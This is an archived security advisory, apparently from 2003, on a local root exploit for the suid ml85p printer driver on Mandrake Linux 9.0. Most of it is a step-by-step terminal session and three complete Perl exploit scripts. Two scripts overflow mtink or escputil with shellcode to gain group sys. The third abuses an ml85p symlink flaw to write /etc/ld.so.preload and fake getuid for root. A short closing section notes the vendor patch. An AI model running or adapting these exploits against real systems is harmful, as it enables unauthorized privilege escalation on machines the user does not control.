28th Feb 2003 [SBWID-6030]
COMMAND
ml85p local root exploit
SYSTEMS AFFECTED
Mandrake 9
PROBLEM
In Priv8 Security advisory :
http://www.priv8security.com
Credits to iDefense [http://www.idefense.com/advisory/01.21.03.txt]
Ok, our goal is to get root by exploiting ml85p thats suid root by
default on mdk 9.0
[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Set 17 16:40
/usr/bin/ml85p*
You can see that we gona need group sys to run it so first lets get it.
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x 1 lp sys 132600 Set 17 16:40
/usr/bin/mtink*
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x 1 lp sys 32088 Set 17 16:40
/usr/bin/escputil*
We have two here that are vuln, mtink has a stack overflow on env HOME
and escputil has a stack over too on command line arg, for more details
read idefense adv.
So here we go.... First we get gid sys by exploiting mtink or escputil,
u can choose what one u want to.
[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl priv8mtink.pl
Priv8security.com Mandrake 9 mtink local sys exploit!!
usage: priv8mtink.pl offset
Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
And now we can exploit ml85p
1 - Writing any file on system!!!
sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p Now just press enter ;) Wrong file format.
file position: ffffffff
sh-2.05b$
Now we check if it worked....
[root@localhost root]# pwd
/root
[root@localhost root]# ls -l hi*
-rw-rw-rw- 1 root sys 0 Fev 24 03:32
hi-there-Mr-root
2 - Geting root with it ;)
I will do the same thing on idefense adv, so lets do it..
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Feb 26 00:12
/etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)
It worked, so take care what u ll write ok ;) that's it.
------------------------------------------------------------------------------------------------------------------
priv8escputil.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com escputil local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode =
"\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
"\x03". # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1050;
$retaddr = 0xbffff4e0;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
$offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 escputil local
sys exploit!!\n";
print " usage: $0 offset\n";
for ($i = 0; $i < ($size - length($shellcode) - 4);
$i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr +
$offset));
for ($i += length($shellcode); $i <
$size; $i += 4) {
$buffer .= $newret;
}
exec("/usr/bin/escputil -c -P
$buffer");
------------------------------------------------------------------------------------------------------------------
priv8ml85p.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com ml85p local root exploit.
#
# This exploit erase any file on system, u ll need
group sys to do it
# so run priv8mtink.pl or priv8escputil.pl to get
it ;)
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
if (@ARGV == 1) {
$file = $ARGV[0];
$b = "/tmp/ml85g";
$b .= time();
exec(umask 000);
system("ln -s $file '$b'");
print "Lets write some files ok ;p\n";
print "Now just press enter....\n";
if (system("/usr/bin/ml85p -s") == -1){
print "You cant run ml85p, check
if u have gid sys...\n";
}
exit(1);
} else {
print "\n!!! Priv8security.com ml85p local
root exploit by wsxz !!!\n";
print " Usage: perl $0
file-to-overwrite\n\n";
}
------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
priv8mtink.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com mtink local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode2 =
"\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
"\x03". # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1056;
$retaddr = 0xbffffa80;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
$offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 mtink local sys
exploit!!\n";
print " usage: $0 offset\n";
for ($i = 0; $i < ($size -
length($shellcode2) - 4); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode2;
print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr +
$offset));
for ($i += length($shellcode2); $i
< $size; $i += 4) {
$buffer .= $newret;
}
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/mtink");
------------------------------------------------------------------------------------------------------------------
SOLUTION
A patch written by Till Kamppeter was applied to ml85p to fix that
vulnerability. Updates are provided for Mandrake Linux 8.1 through 9.0
for the printer-drivers packages, and ghostscript in 8.0 to fix these
vulnerabilities (MDKSA-2003:010).